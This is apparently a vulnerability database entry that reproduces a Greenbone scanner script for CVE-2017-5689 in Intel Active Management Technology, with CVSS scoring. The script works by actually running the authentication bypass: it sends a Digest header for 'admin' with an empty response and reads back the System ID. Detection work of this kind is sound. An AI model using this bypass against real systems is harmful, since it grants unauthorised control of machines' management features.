9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.4 High
AI Score
Confidence
Low
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%
Intel system with Intel Active Management Technology enabled is prone to a privilege escalation vulnerability.
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/o:intel:active_management_technology_firmware";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.810996");
script_version("2023-08-18T16:09:48+0000");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
script_cve_id("CVE-2017-5689");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"last_modification", value:"2023-08-18 16:09:48 +0000 (Fri, 18 Aug 2023)");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2020-02-18 17:12:00 +0000 (Tue, 18 Feb 2020)");
script_tag(name:"creation_date", value:"2017-05-05 15:39:37 +0530 (Fri, 05 May 2017)");
script_tag(name:"qod_type", value:"exploit");
script_name("Intel Active Management Technology Privilege Escalation Vulnerability");
script_tag(name:"summary", value:"Intel system with Intel Active Management Technology enabled is prone to a privilege escalation vulnerability.");
script_tag(name:"vuldetect", value:"Send a crafted data via HTTP GET request
and check if we are able to access the manageability features of this product.");
script_tag(name:"insight", value:"The flaw exists due to mishandling of input
in an unknown function.");
script_tag(name:"impact", value:"Successful exploitation will allow an
unprivileged attacker to gain control of the manageability features provided
by these products.");
script_tag(name:"affected", value:"Intel Active Management Technology
manageability firmware versions 6.x before 6.2.61.3535, 7.x before 7.1.91.3272,
8.x before 8.1.71.3608, 9.0.x and 9.1.x before 9.1.41.3024, 9.5.x before
9.5.61.3012, 10.x before 10.0.55.3000, 11.0.x before 11.0.25.3001, 11.5.x and
11.6.x before 11.6.27.3264.");
script_tag(name:"solution", value:"Upgrade to Intel Active Management Technology
manageability firmware versions 6.2.61.3535 or 7.1.91.3272 or 8.1.71.3608 or
9.1.41.3024 or 9.5.61.3012 or 10.0.55.3000 or 11.0.25.3001 or 11.6.27.3264 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00075.html");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/98269");
script_xref(name:"URL", value:"https://arstechnica.com/security/2017/05/intel-patches-remote-code-execution-bug-that-lurked-in-cpus-for-10-years");
script_xref(name:"URL", value:"https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability");
script_xref(name:"URL", value:"https://downloadcenter.intel.com/download/26754");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2017 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_intel_amt_webui_detect.nasl");
script_mandatory_keys("intel_amt/installed");
script_require_ports("Services/www", 16992, 16993);
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
if(!port = get_app_port(cpe:CPE))
exit(0);
if(!dir = get_app_location(cpe:CPE, port:port))
exit(0);
if(dir == "/")
dir = "";
url = dir + "/index.htm";
req = http_get_req(port:port, url:url);
res = http_keepalive_send_recv(port:port, data:req);
if(res && "Server: Intel(R) Active Management Technology" >< res) {
match = eregmatch(string:res, pattern:'"Digest.(.*)", nonce="(.*)",stale');
if(match[1] && match[2]) {
digest = match[1];
nonce = match[2];
} else {
exit(0);
}
cnonce = rand_str(length:10);
asp_session = string('Digest username="admin", realm="Digest:', digest, '", nonce="',
nonce, '", uri="/index.htm", response="", qop=auth, nc=00000001,
cnonce="' + cnonce + '"');
req = http_get_req(port:port, url:url, add_headers:make_array("Authorization", asp_session));
res = http_keepalive_send_recv(port:port, data:req);
if(res =~ "^HTTP/1\.[01] 200" && "Server: Intel(R) Active Management Technology" >< res
&& ">Hardware Information" >< res && ">IP address" >< res && ">System ID" >< res
&& ">System<" >< res && ">Processor<" >< res && ">Memory<" >< res) {
sys_id = eregmatch(pattern:"System ID(</p></td>)?.( )?<td class=r1>([^<\n\r]+)", string:res);
report = "It was possible to access /index.htm by bypassing authentication.\n";
if (!isnull(sys_id[3]))
report += "Among other information the System ID could be retrieved:\nSystem ID: " + sys_id[3];
security_message(port:port, data:report);
exit(0);
}
exit(99);
}
exit(0);
www.securityfocus.com/bid/98269
arstechnica.com/security/2017/05/intel-patches-remote-code-execution-bug-that-lurked-in-cpus-for-10-years
downloadcenter.intel.com/download/26754
www.cisa.gov/known-exploited-vulnerabilities-catalog
www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability
www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00075.html
Known Exploited Vulnerability (KEV) catalog
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.4 High
AI Score
Confidence
Low
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%